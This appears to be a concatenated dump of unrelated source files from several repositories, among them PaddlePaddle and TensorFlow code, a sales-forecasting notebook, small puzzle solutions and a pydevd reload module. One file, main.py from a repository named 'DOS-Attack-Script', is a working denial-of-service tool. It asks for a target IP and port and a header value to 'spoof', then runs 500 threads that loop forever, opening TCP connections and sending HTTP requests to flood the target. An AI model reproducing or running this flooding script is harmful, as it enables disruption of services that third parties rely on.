    def contains4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> bool:
        return self.contains(x)
    def contains5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
        return self.contains(x)
def makeNode(x: int) -> TreeNode:
    # Allocate a leaf TreeNode holding x; children stay None.
    node:TreeNode = None
    node = TreeNode()
    node.value = x
    return node
def makeNode2(x: int, x2: int) -> TreeNode2:
    # Allocate a leaf TreeNode2; only the primary `value` is initialised
    # (x2 and the secondary fields keep their class defaults, as in the
    # rest of the suite).  The unused local declaration b2 was removed.
    b:TreeNode2 = None
    b = TreeNode2()
    b.value = x
    return b
def makeNode3(x: int, x2: int, x3: int) -> TreeNode3:
    # Allocate a leaf TreeNode3; only the primary `value` is initialised.
    # Unused local declarations b2/b3 were removed.
    b:TreeNode3 = None
    b = TreeNode3()
    b.value = x
    return b
def makeNode4(x: int, x2: int, x3: int, x4: int) -> TreeNode4:
    # Allocate a leaf TreeNode4; only the primary `value` is initialised.
    # Unused local declarations b2..b4 were removed.
    b:TreeNode4 = None
    b = TreeNode4()
    b.value = x
    return b
def makeNode5(x: int, x2: int, x3: int, x4: int, x5: int) -> TreeNode5:
    # Allocate a leaf TreeNode5; only the primary `value` is initialised.
    # Unused local declarations b2..b5 were removed.
    b:TreeNode5 = None
    b = TreeNode5()
    b.value = x
    return b
# Input parameters
# Only n (number of insertion rounds) and c (skip stride) are read by the
# driver below; the numbered copies are unused here.
n:int = 100
n2:int = 100
n3:int = 100
n4:int = 100
n5:int = 100
c:int = 4
c2:int = 4
c3:int = 4
c4:int = 4
c5:int = 4
# Data
# t is the tree under test, i the loop counter, k a multiplicative
# pseudo-random key sequence modulo 37831.
t:Tree = None
t2:Tree = None
t3:Tree = None
t4:Tree = None
t5:Tree = None
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
k:int = 37813
k2:int = 37813
k3:int = 37813
k4:int = 37813
k5:int = 37813
# Crunch
t = Tree()
while i < n:
    t.insert(k)
    # Advance the pseudo-random key: k <- k * 37813 (mod 37831).
    k = (k * 37813) % 37831
    if i % c != 0:
        # Also insert the loop index itself, except on every c-th iteration.
        t.insert(i)
    i = i + 1
# Number of distinct values inserted.
print(t.size)
# Report which of these probe values ended up in the tree.
for i in [4, 8, 15, 16, 23, 42]:
    if t.contains(i):
        print(i)
| [
"[email protected]"
] | |
f446b6c8b2833b421592915d637db99761f2c596 | 18aee5d93a63eab684fe69e3aa0abd1372dd5d08 | /python/paddle/nn/layer/distance.py | e2fb10f252f1008f0ddc5e41e1e48afbedb8d67c | [
"Apache-2.0"
] | permissive | Shixiaowei02/Paddle | 8d049f4f29e281de2fb1ffcd143997c88078eadb | 3d4d995f26c48f7792b325806ec3d110fc59f6fc | refs/heads/develop | 2023-06-26T06:25:48.074273 | 2023-06-14T06:40:21 | 2023-06-14T06:40:21 | 174,320,213 | 2 | 1 | Apache-2.0 | 2022-12-28T05:14:30 | 2019-03-07T10:09:34 | C++ | UTF-8 | Python | false | false | 3,333 | py | # Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .. import functional as F
from .layers import Layer
__all__ = []
class PairwiseDistance(Layer):
r"""
It computes the pairwise distance between two vectors. The
distance is calculated by p-oreder norm:
.. math::
\Vert x \Vert _p = \left( \sum_{i=1}^n \vert x_i \vert ^ p \right) ^ {1/p}.
Parameters:
p (float, optional): The order of norm. Default: :math:`2.0`.
epsilon (float, optional): Add small value to avoid division by zero.
Default: :math:`1e-6`.
keepdim (bool, optional): Whether to reserve the reduced dimension
in the output Tensor. The result tensor is one dimension less than
the result of ``|x-y|`` unless :attr:`keepdim` is True. Default: False.
name (str, optional): For details, please refer to :ref:`api_guide_Name`.
Generally, no setting is required. Default: None.
Shape:
- x: :math:`[N, D]` or :math:`[D]`, where :math:`N` is batch size, :math:`D`
is the dimension of the data. Available data type is float16, float32, float64.
- y: :math:`[N, D]` or :math:`[D]`, y have the same dtype as x.
- output: The same dtype as input tensor.
- If :attr:`keepdim` is True, the output shape is :math:`[N, 1]` or :math:`[1]`,
depending on whether the input has data shaped as :math:`[N, D]`.
- If :attr:`keepdim` is False, the output shape is :math:`[N]` or :math:`[]`,
depending on whether the input has data shaped as :math:`[N, D]`.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([[1., 3.], [3., 5.]], dtype=paddle.float64)
y = paddle.to_tensor([[5., 6.], [7., 8.]], dtype=paddle.float64)
dist = paddle.nn.PairwiseDistance()
distance = dist(x, y)
print(distance)
# Tensor(shape=[2], dtype=float64, place=Place(gpu:0), stop_gradient=True,
# [4.99999860, 4.99999860])
"""
def __init__(self, p=2.0, epsilon=1e-6, keepdim=False, name=None):
super().__init__()
self.p = p
self.epsilon = epsilon
self.keepdim = keepdim
self.name = name
def forward(self, x, y):
return F.pairwise_distance(
x, y, self.p, self.epsilon, self.keepdim, self.name
)
def extra_repr(self):
main_str = 'p={p}'
if self.epsilon != 1e-6:
main_str += ', epsilon={epsilon}'
if self.keepdim is not False:
main_str += ', keepdim={keepdim}'
if self.name is not None:
main_str += ', name={name}'
return main_str.format(**self.__dict__)
| [
"[email protected]"
] | |
50ddef3e12604adbe00d3db3058a99758b1c10a0 | e02af62b3d0b8737a728b8169b91c37b7b99d0ab | /main.py | 43fc35413573f68d256ac16ab919537e9c42fe30 | [] | no_license | z9fr/DOS-Attack-Script | debaa6f7e7d04caaa658407d16208e4da2c32927 | 098920523bf5c152a86e1e32a8298f908f7f24fe | refs/heads/main | 2023-03-22T01:45:19.137301 | 2021-03-22T18:51:46 | 2021-03-22T18:51:46 | 313,788,301 | 11 | 5 | null | null | null | null | UTF-8 | Python | false | false | 1,604 | py | import socket
import threading
#target_ip = '195.20.52.179'
#fake_ip = '182.21.20.32'
#port = 80
print("\n\n")
print(" +-------------------------------------+")
print(" | nov, 18th, 2020 |")
print(" | This is a simple DOS attack script |")
print(" | Github: https://github.com/d4az |")
print(" | Author: Dasith Vidanage |")
print(" | Version: 0.1 |")
print(" +---------------------------d4az------+ ")
print("\n\n")
print("Enter ip Address of The Target ")
print("To Get the ip adress You can ping the domain in the terminal. eg #target = '120.00.00.000'")
target = input("\t == > ")
print("Enter The Fake Ip Address that you wants to spoof. eg: #fake_ip = '120.00.00.01' ")
fake_ip = input("\t\t ==> ")
print("Enter The Port Number You Want to Attack ? ")
port = input("\t\t ==> ")
port = int(port)
attack_num = 0
print("Sending Packets...")
def attack():
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))
global attack_num
attack_num += 1
packesnum =attack_num
packesnum= str(packesnum)
print("Packets Sending => "+packesnum)
print("Done")
s.close()
print("Packets Send Sucess!")
for i in range(500):
thread = threading.Thread(target=attack)
thread.start()
| [
"[email protected]"
] | |
951368bbcf5ba887bbf79ec62af53c593f6f56e3 | 4ba1d93c5930afca3c5831504f02403999df1d9c | /Forecasting_cococola.py | 955a8bcb152f483b33b183188453502b9de1b00e | [] | no_license | Isiribn/Forecasting | 39273142f93cc657e1e77ac05180c55b4b1287db | ddb8065aa2a677e5ac42a7a7248ec953843341ba | refs/heads/main | 2023-04-01T05:57:44.900968 | 2021-04-09T11:28:58 | 2021-04-09T11:28:58 | 356,242,339 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,661 | py | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd
data=pd.read_excel('CocaCola_Sales_Rawdata.xlsx')
data.head()
# In[2]:
data.shape
# In[3]:
data.isnull().any()
# In[4]:
data.duplicated().any()
# In[5]:
data.info()
# In[6]:
data.describe()
# In[7]:
data.hist()
# In[10]:
import matplotlib.pyplot as plt
data.Sales.plot(label="org")
for i in range(2, 10, 2):
data["Sales"].rolling(i).mean().plot(label=str(i))
plt.legend(loc=3)
# In[11]:
data.plot(kind='kde')
# In[12]:
import statsmodels.api as sm
from statsmodels.tsa.seasonal import seasonal_decompose
from statsmodels.tsa.holtwinters import SimpleExpSmoothing # SES
from statsmodels.tsa.holtwinters import Holt # Holts Exponential Smoothing
from statsmodels.tsa.holtwinters import ExponentialSmoothing
import statsmodels.graphics.tsaplots as tsa_plots
import statsmodels.tsa.statespace as tm_models
#from datetime import datetime,time
# In[13]:
tsa_plots.plot_acf(data.Sales,lags=10)
tsa_plots.plot_pacf(data.Sales)
# In[14]:
train=data.head(48)
test=data.tail(12)
# In[15]:
import numpy as np
def MAPE(pred,org):
temp=np.abs((pred-org))*100/org
return np.mean(temp)
# In[16]:
#Simple Exponential Smoothing
ses_model=SimpleExpSmoothing(train["Sales"]).fit()
pred_ses=ses_model.predict(start=test.index[0],end=test.index[-1])
MAPE(pred_ses,test.Sales)
# In[17]:
#Holt Exponential smoothing
hw_model=Holt(train["Sales"]).fit()
pred_hw=hw_model.predict(start=test.index[0], end=test.index[-1])
MAPE(pred_hw,test.Sales)
# In[18]:
hwe_model_add_add = ExponentialSmoothing(train["Sales"],seasonal="add",trend="add",seasonal_periods=4,damped=True).fit()
pred_hwe_add_add = hwe_model_add_add.predict(start = test.index[0],end = test.index[-1])
MAPE(pred_hwe_add_add,test.Sales)
# In[19]:
hwe_model_mul_add = ExponentialSmoothing(train["Sales"],seasonal="mul",trend="add",seasonal_periods=4).fit()
pred_hwe_mul_add = hwe_model_mul_add.predict(start = test.index[0],end = test.index[-1])
MAPE(pred_hwe_mul_add,test.Sales)
# In[20]:
plt.plot(train.index, train["Sales"], label='Train',color="r")
# In[21]:
plt.plot(test.index, test["Sales"], label='Test',color="blue")
# In[22]:
plt.plot(pred_ses.index, pred_ses, label='SimpleExponential',color="green")
plt.plot(pred_hw.index, pred_hw, label='Holts_winter',color="red")
# In[23]:
plt.plot(pred_hwe_add_add.index,pred_hwe_add_add,label="HoltsWinterExponential_1",color="brown")
plt.plot(pred_hwe_mul_add.index,pred_hwe_mul_add,label="HoltsWinterExponential_2",color="yellow")
plt.legend(loc='best')
# In[ ]:
# In[ ]:
# In[ ]:
| [
"[email protected]"
] | |
563546f5b953d8a2b7b512856a99df5b88aef108 | bc23a3734e3ae3be64c6e5a1ae94204552d1a554 | /Arrays and Strings/06_findAinBOfString.py | 7556ff9313cf7b568601a6be3437ae664db28a80 | [] | no_license | mmrraju/Coding-interview-preparation | c3c2fc91c5ccbb383f4672af4ea77f169281529c | 738949fe7bc6e50d4bd55ac0b2b47c002ca0f464 | refs/heads/main | 2023-08-29T16:06:46.990849 | 2021-10-20T07:15:46 | 2021-10-20T07:15:46 | 408,050,819 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 852 | py | """ Given two stings ransomNote and magazine, return true if ransomNote can be constructed from magazine and false otherwise.
Each letter in magazine can only be used once in ransomNote """
magazine = input()
ransomNote = input()
def isMagazineInRansomNote(magazine, ransomNote):
    """Return True if ransomNote can be built from magazine's letters.

    Each letter of `magazine` may be used at most once.
    Runs in O(len(magazine) + len(ransomNote)) time.
    """
    from collections import Counter
    # Counter subtraction keeps only positive counts, so the difference is
    # non-empty exactly when ransomNote needs a letter magazine lacks.
    # This replaces the hand-rolled dict counting with its branchy
    # decrement-or-delete bookkeeping.
    return not (Counter(ransomNote) - Counter(magazine))
print(isMagazineInRansomNote(magazine, ransomNote))
| [
"[email protected]"
] | |
97d31bc99318da98c36566bc2f7a502e1953d6d9 | 54e4c1a57765519c77d04fc02112c7f3bbacc595 | /prob_1317.py | 11e01b22fc965fafc4a81f4f1b4e4ef0ee88e358 | [] | no_license | Hrishikesh-3459/leetCode | 80a864228a8a2ae41ac2623f970a13f409234eed | 42def57b8f70d179ca688314ae43747fc1e410a0 | refs/heads/master | 2023-05-07T01:37:19.375229 | 2021-05-25T01:58:05 | 2021-05-25T01:58:05 | 254,803,743 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 744 | py | class Solution:
def sortString(self, s: str) -> str:
x = list(s)
ans = []
ans_2 = []
fin = []
count = 0
while True:
for i in sorted(x):
if (i not in ans):
ans.append(i)
count +=1
x.pop(x.index(i))
for j in sorted(x)[::-1]:
if (j not in ans_2):
count +=1
ans_2.append(j)
x.pop(x.index(j))
fin += ans + ans_2
if (count == len(s)):
break
ans.clear()
ans_2.clear()
ans_str = ""
for j in fin:
ans_str += j
return ans_str
| [
"[email protected]"
] | |
b393f63f6ac9ee26aceb40dd7bb00e64e25785d3 | d806dd4a6791382813d2136283a602207fb4b43c | /sirius/blueprints/api/remote_service/tula/passive/childbirth/views.py | 1e86681447f1b9f6b1e9f4f7d3e504d827b7a501 | [] | no_license | MarsStirner/sirius | 5bbf2a03dafb7248db481e13aff63ff989fabbc2 | 8839460726cca080ca8549bacd3a498e519c8f96 | refs/heads/master | 2021-03-24T12:09:14.673193 | 2017-06-06T16:28:53 | 2017-06-06T16:28:53 | 96,042,947 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,382 | py | #! coding:utf-8
"""
@author: BARS Group
@date: 03.10.2016
"""
import sys
from flask import request
from sirius.blueprints.api.remote_service.tula.app import module
from sirius.blueprints.api.remote_service.tula.entities import TulaEntityCode
from sirius.blueprints.api.remote_service.tula.passive.childbirth.xform import \
ChildbirthTulaXForm
from sirius.blueprints.monitor.exception import remote_api_method
from sirius.blueprints.monitor.logformat import hook
parent_id_name = 'card_id'
@module.route('/api/integration/<int:api_version>/card/<' + parent_id_name + '>/childbirth/',
methods=['POST', 'PUT', 'DELETE'])
@remote_api_method(hook=hook)
def api_childbirth_change(api_version, **kwargs):
# main_id = kwargs.get(main_id_name)
parent_id = kwargs.get(parent_id_name)
stream_id = kwargs.get('stream_id')
data = None
delete = request.method == 'DELETE'
xform = ChildbirthTulaXForm(api_version, stream_id)
if not delete:
data = request.get_json()
xform.validate(data)
# main_id = data.get('main_id')
# xform.check_params(card_id, main_id, data)
service_name = sys._getframe().f_code.co_name
parents_params = {
parent_id_name: {'entity': TulaEntityCode.CARD, 'id': parent_id},
}
xform.send_messages(parent_id, parent_id_name, data, service_name, request.method, parents_params)
| [
"[email protected]"
] | |
c6569d076ffb391b828b0b0ad13e3266739a768b | 82b946da326148a3c1c1f687f96c0da165bb2c15 | /sdk/python/pulumi_azure_native/attestation/v20210601preview/_enums.py | 647247b71cec4cfaee5ae075082eafac95c1b2cc | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | morrell/pulumi-azure-native | 3916e978382366607f3df0a669f24cb16293ff5e | cd3ba4b9cb08c5e1df7674c1c71695b80e443f08 | refs/heads/master | 2023-06-20T19:37:05.414924 | 2021-07-19T20:57:53 | 2021-07-19T20:57:53 | 387,815,163 | 0 | 0 | Apache-2.0 | 2021-07-20T14:18:29 | 2021-07-20T14:18:28 | null | UTF-8 | Python | false | false | 921 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from enum import Enum
__all__ = [
'PrivateEndpointServiceConnectionStatus',
'PublicNetworkAccessType',
]
class PrivateEndpointServiceConnectionStatus(str, Enum):
"""
Indicates whether the connection has been Approved/Rejected/Removed by the owner of the service.
"""
PENDING = "Pending"
APPROVED = "Approved"
REJECTED = "Rejected"
class PublicNetworkAccessType(str, Enum):
"""
Controls whether traffic from the public network is allowed to access the Attestation Provider APIs.
"""
ENABLED = "Enabled"
"""Enables public network connectivity to the Attestation Provider REST APIs."""
DISABLED = "Disabled"
"""Disables public network connectivity to the Attestation Provider REST APIs."""
| [
"[email protected]"
] | |
0db5944ca26ded9a495afea5174be02aae5227b6 | 4671a70af604078c1c75ec11721620c091ee2873 | /bootcampBot_2.py | 7d12196e0688da826a29181db98821e546114d8f | [] | no_license | raheels88/DiscordPY_Bootcamp | a02b11a7755e2e3ebe402c86ba8071e77ec89f8a | 50bf5de85aa8c3180d49c4c7f35b87714ed3fe40 | refs/heads/main | 2023-07-15T17:22:42.551506 | 2021-08-18T18:29:21 | 2021-08-18T18:29:21 | 396,949,602 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,125 | py | import discord
import os
from yahoo_fin import stock_info as si #import yahoo_fin Python package - used to scrape stock price data from Yahoo Finance
client = discord.Client()
@client.event
async def on_ready():
print('Beep Boop Beep...{0.user}'.format(client) + ' is online')
#### MAKE YOUR BOT FETCH LIVE STOCK PRICES ###
@client.event
async def on_message(message):
msg = message.content
if message.author == client.user:
return
if msg.startswith('$hello'):
await message.channel.send('Hello!')
if msg.startswith('!price'): #if the message (sent by anyone but the bot) starts with '$price'...
ticker = msg[7:] #assign the variable 'ticker' to be the contents of the message from the 7th character onwards
price = round(si.get_live_price(ticker),2) #get_live_price is a method in the yahoo_fin package - this line gets the live price and rounds to 2 decimal places, and assigns the value to 'price'
await message.channel.send('Price of ' + ticker + ' is $' + str(price)) #Concatenate ticker and price variables with a + sign
client.run(os.getenv('TOKEN')) | [
"[email protected]"
] | |
0c0a1446e1f0184e7126eb177937b571e856de8d | 84a96dbd96e926ebb5c658e3cb897db276c32d6c | /tensorflow/python/ops/ragged/ragged_segment_op_test.py | d29708a5f5d98360502b4aef830d8d7c69c18c5c | [
"Apache-2.0"
] | permissive | MothCreations/gavlanWheels | bc9189092847369ad291d1c7d3f4144dd2239359 | 01d8a43b45a26afec27b971f686f79c108fe08f9 | refs/heads/master | 2022-12-06T09:27:49.458800 | 2020-10-13T21:56:40 | 2020-10-13T21:56:40 | 249,206,716 | 6 | 5 | Apache-2.0 | 2022-11-21T22:39:47 | 2020-03-22T14:57:45 | C++ | UTF-8 | Python | false | false | 9,618 | py | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for ragged_range op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
from absl.testing import parameterized
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import errors
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops.ragged import ragged_factory_ops
from tensorflow.python.ops.ragged import ragged_math_ops
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.platform import googletest
def prod(values):
  """Returns the product of `values` (1 for an empty sequence)."""
  # Kept as an explicit loop for py2/py3 compatibility (this file still
  # imports from __future__); the dead commented-out reduce() variant
  # that used to trail this function was removed.
  val = 1
  for v in values:
    val *= v
  return val
def mean(values):
  """Arithmetic mean of `values`, always as a float."""
  return sum(values) / float(len(values))
def sqrt_n(values):
  """Sum of `values` scaled by 1/sqrt(len(values)) (sqrt-n combiner)."""
  total = float(sum(values))
  return total / math.sqrt(len(values))
@test_util.run_all_in_graph_and_eager_modes
class RaggedSegmentOpsTest(test_util.TensorFlowTestCase,
                           parameterized.TestCase):
  """Parameterized tests for ragged_math_ops.segment_<sum|prod|min|max|mean|sqrt_n>."""
  def expected_value(self, data, segment_ids, num_segments, combiner):
    """Find the expected value for a call to ragged_segment_<aggregate>.
    Args:
      data: The input RaggedTensor, expressed as a nested python list.
      segment_ids: The segment ids, as a python list of ints.
      num_segments: The number of segments, as a python int.
      combiner: The Python function used to combine values.
    Returns:
      The expected value, as a nested Python list.
    """
    self.assertLen(data, len(segment_ids))
    # Build an empty (num_segments x ncols) "grouped" matrix
    ncols = max(len(row) for row in data)
    grouped = [[[] for _ in range(ncols)] for row in range(num_segments)]
    # Append values from data[row] to grouped[segment_ids[row]]
    for row in range(len(data)):
      for col in range(len(data[row])):
        grouped[segment_ids[row]][col].append(data[row][col])
    # Combine the values.
    return [[combiner(values)
             for values in grouped_row
             if values]
            for grouped_row in grouped]
  @parameterized.parameters(
      (ragged_math_ops.segment_sum, sum, [0, 0, 1, 1, 2, 2]),
      (ragged_math_ops.segment_sum, sum, [0, 0, 0, 1, 1, 1]),
      (ragged_math_ops.segment_sum, sum, [5, 4, 3, 2, 1, 0]),
      (ragged_math_ops.segment_sum, sum, [0, 0, 0, 10, 10, 10]),
      (ragged_math_ops.segment_prod, prod, [0, 0, 1, 1, 2, 2]),
      (ragged_math_ops.segment_prod, prod, [0, 0, 0, 1, 1, 1]),
      (ragged_math_ops.segment_prod, prod, [5, 4, 3, 2, 1, 0]),
      (ragged_math_ops.segment_prod, prod, [0, 0, 0, 10, 10, 10]),
      (ragged_math_ops.segment_min, min, [0, 0, 1, 1, 2, 2]),
      (ragged_math_ops.segment_min, min, [0, 0, 0, 1, 1, 1]),
      (ragged_math_ops.segment_min, min, [5, 4, 3, 2, 1, 0]),
      (ragged_math_ops.segment_min, min, [0, 0, 0, 10, 10, 10]),
      (ragged_math_ops.segment_max, max, [0, 0, 1, 1, 2, 2]),
      (ragged_math_ops.segment_max, max, [0, 0, 0, 1, 1, 1]),
      (ragged_math_ops.segment_max, max, [5, 4, 3, 2, 1, 0]),
      (ragged_math_ops.segment_max, max, [0, 0, 0, 10, 10, 10]),
      (ragged_math_ops.segment_mean, mean, [0, 0, 1, 1, 2, 2]),
      (ragged_math_ops.segment_mean, mean, [0, 0, 0, 1, 1, 1]),
      (ragged_math_ops.segment_mean, mean, [5, 4, 3, 2, 1, 0]),
      (ragged_math_ops.segment_mean, mean, [0, 0, 0, 10, 10, 10]),
  )
  def testRaggedSegment_Int(self, segment_op, combiner, segment_ids):
    # Each ragged op result is checked against the pure-Python reference
    # computed by expected_value() with the matching combiner.
    rt_as_list = [[0, 1, 2, 3], [4], [], [5, 6], [7], [8, 9]]
    rt = ragged_factory_ops.constant(rt_as_list)
    num_segments = max(segment_ids) + 1
    expected = self.expected_value(rt_as_list, segment_ids, num_segments,
                                   combiner)
    segmented = segment_op(rt, segment_ids, num_segments)
    self.assertAllEqual(segmented, expected)
  @parameterized.parameters(
      (ragged_math_ops.segment_sum, sum, [0, 0, 1, 1, 2, 2]),
      (ragged_math_ops.segment_sum, sum, [0, 0, 0, 1, 1, 1]),
      (ragged_math_ops.segment_sum, sum, [5, 4, 3, 2, 1, 0]),
      (ragged_math_ops.segment_sum, sum, [0, 0, 0, 10, 10, 10]),
      (ragged_math_ops.segment_prod, prod, [0, 0, 1, 1, 2, 2]),
      (ragged_math_ops.segment_prod, prod, [0, 0, 0, 1, 1, 1]),
      (ragged_math_ops.segment_prod, prod, [5, 4, 3, 2, 1, 0]),
      (ragged_math_ops.segment_prod, prod, [0, 0, 0, 10, 10, 10]),
      (ragged_math_ops.segment_min, min, [0, 0, 1, 1, 2, 2]),
      (ragged_math_ops.segment_min, min, [0, 0, 0, 1, 1, 1]),
      (ragged_math_ops.segment_min, min, [5, 4, 3, 2, 1, 0]),
      (ragged_math_ops.segment_min, min, [0, 0, 0, 10, 10, 10]),
      (ragged_math_ops.segment_max, max, [0, 0, 1, 1, 2, 2]),
      (ragged_math_ops.segment_max, max, [0, 0, 0, 1, 1, 1]),
      (ragged_math_ops.segment_max, max, [5, 4, 3, 2, 1, 0]),
      (ragged_math_ops.segment_max, max, [0, 0, 0, 10, 10, 10]),
      (ragged_math_ops.segment_mean, mean, [0, 0, 1, 1, 2, 2]),
      (ragged_math_ops.segment_mean, mean, [0, 0, 0, 1, 1, 1]),
      (ragged_math_ops.segment_mean, mean, [5, 4, 3, 2, 1, 0]),
      (ragged_math_ops.segment_mean, mean, [0, 0, 0, 10, 10, 10]),
      (ragged_math_ops.segment_sqrt_n, sqrt_n, [0, 0, 1, 1, 2, 2]),
      (ragged_math_ops.segment_sqrt_n, sqrt_n, [0, 0, 0, 1, 1, 1]),
      (ragged_math_ops.segment_sqrt_n, sqrt_n, [5, 4, 3, 2, 1, 0]),
      (ragged_math_ops.segment_sqrt_n, sqrt_n, [0, 0, 0, 10, 10, 10]),
  )
  def testRaggedSegment_Float(self, segment_op, combiner, segment_ids):
    # Same as the int test, plus sqrt_n (float-only); uses assertAllClose
    # because the float combiners are not exact.
    rt_as_list = [[0., 1., 2., 3.], [4.], [], [5., 6.], [7.], [8., 9.]]
    rt = ragged_factory_ops.constant(rt_as_list)
    num_segments = max(segment_ids) + 1
    expected = self.expected_value(rt_as_list, segment_ids, num_segments,
                                   combiner)
    segmented = segment_op(rt, segment_ids, num_segments)
    self.assertAllClose(segmented, expected)
  def testRaggedRankTwo(self):
    # Segmenting the outer rows of a rank-3 ragged tensor: rows with the
    # same segment id are summed elementwise.
    rt = ragged_factory_ops.constant([
        [[111, 112, 113, 114], [121],],  # row 0
        [],                              # row 1
        [[], [321, 322], [331]],         # row 2
        [[411, 412]]                     # row 3
    ])  # pyformat: disable
    segment_ids1 = [0, 2, 2, 2]
    segmented1 = ragged_math_ops.segment_sum(rt, segment_ids1, 3)
    expected1 = [[[111, 112, 113, 114], [121]],  # row 0
                 [],                             # row 1
                 [[411, 412], [321, 322], [331]]  # row 2
                ]  # pyformat: disable
    self.assertAllEqual(segmented1, expected1)
    segment_ids2 = [1, 2, 1, 1]
    segmented2 = ragged_math_ops.segment_sum(rt, segment_ids2, 3)
    expected2 = [[],
                 [[111+411, 112+412, 113, 114], [121+321, 322], [331]],
                 []]  # pyformat: disable
    self.assertAllEqual(segmented2, expected2)
  def testRaggedSegmentIds(self):
    # segment_ids itself is ragged here, so ids apply to the inner rows
    # rather than the outermost dimension.
    rt = ragged_factory_ops.constant([
        [[111, 112, 113, 114], [121],],  # row 0
        [],                              # row 1
        [[], [321, 322], [331]],         # row 2
        [[411, 412]]                     # row 3
    ])  # pyformat: disable
    segment_ids = ragged_factory_ops.constant([[1, 2], [], [1, 1, 2], [2]])
    segmented = ragged_math_ops.segment_sum(rt, segment_ids, 3)
    expected = [[],
                [111+321, 112+322, 113, 114],
                [121+331+411, 412]]  # pyformat: disable
    self.assertAllEqual(segmented, expected)
  def testShapeMismatchError1(self):
    # Ragged segment_ids with dense data is rejected up front.
    dt = constant_op.constant([1, 2, 3, 4, 5, 6])
    segment_ids = ragged_factory_ops.constant([[1, 2], []])
    self.assertRaisesRegexp(
        ValueError, 'segment_ids.shape must be a prefix of data.shape, '
        'but segment_ids is ragged and data is not.',
        ragged_math_ops.segment_sum, dt, segment_ids, 3)
  def testShapeMismatchError2(self):
    rt = ragged_factory_ops.constant([
        [[111, 112, 113, 114], [121]],  # row 0
        [],                             # row 1
        [[], [321, 322], [331]],        # row 2
        [[411, 412]]                    # row 3
    ])  # pyformat: disable
    segment_ids = ragged_factory_ops.constant([[1, 2], [1], [1, 1, 2], [2]])
    # Error is raised at graph-building time if we can detect it then.
    self.assertRaisesRegexp(
        errors.InvalidArgumentError,
        'segment_ids.shape must be a prefix of data.shape.*',
        ragged_math_ops.segment_sum, rt, segment_ids, 3)
    # Otherwise, error is raised when we run the graph.
    segment_ids2 = ragged_tensor.RaggedTensor.from_row_splits(
        array_ops.placeholder_with_default(segment_ids.values, None),
        array_ops.placeholder_with_default(segment_ids.row_splits, None))
    with self.assertRaisesRegexp(
        errors.InvalidArgumentError,
        'segment_ids.shape must be a prefix of data.shape.*'):
      self.evaluate(ragged_math_ops.segment_sum(rt, segment_ids2, 3))
if __name__ == '__main__':
  googletest.main()  # delegate to the TF test runner when executed directly
| [
"[email protected]"
] | |
6ccc7f4bb583c7554918ac244ca1883a446d6583 | 8f2c55a2530c3e59dab5907c0044c618b88dd09b | /_pydevd_bundle/pydevd_reload.py | 507e73be2481c064a04777f28cadb48cc7177f70 | [
"Apache-2.0",
"EPL-1.0"
] | permissive | fabioz/PyDev.Debugger | 5a9c6d4c09be85a0e2d9fb93567fd65faf04c81d | 26864816cbfcf002a99913bcc31ebef48042a4ac | refs/heads/main | 2023-08-18T01:08:34.323363 | 2023-04-15T11:15:47 | 2023-04-15T11:15:47 | 21,870,144 | 363 | 126 | Apache-2.0 | 2023-07-30T23:03:31 | 2014-07-15T18:01:12 | Python | UTF-8 | Python | false | false | 15,773 | py | """
Based on the python xreload.
Changes
======================
1. we don't recreate the old namespace from new classes. Rather, we keep the existing namespace,
load a new version of it and update only some of the things we can inplace. That way, we don't break
things such as singletons or end up with a second representation of the same class in memory.
2. If we find it to be a __metaclass__, we try to update it as a regular class.
3. We don't remove old attributes (and leave them lying around even if they're no longer used).
4. Reload hooks were changed
These changes make it more stable, especially in the common case (where in a debug session only the
contents of a function are changed), besides providing flexibility for users that want to extend
on it.
Hooks
======================
Classes/modules can be specially crafted to work with the reload (so that it can, for instance,
update some constant which was changed).
1. To participate in the change of some attribute:
In a module:
__xreload_old_new__(namespace, name, old, new)
in a class:
@classmethod
__xreload_old_new__(cls, name, old, new)
A class or module may include a method called '__xreload_old_new__' which is called when we're
unable to reload a given attribute.
2. To do something after the whole reload is finished:
In a module:
__xreload_after_reload_update__(namespace):
In a class:
@classmethod
__xreload_after_reload_update__(cls):
A class or module may include a method called '__xreload_after_reload_update__' which is called
after the reload finishes.
Important: when providing a hook, always use the namespace or cls provided and not anything in the global
namespace, as the global namespace are only temporarily created during the reload and may not reflect the
actual application state (while the cls and namespace passed are).
Current limitations
======================
- Attributes/constants are added, but not changed (so singletons and the application state is not
broken -- use provided hooks to workaround it).
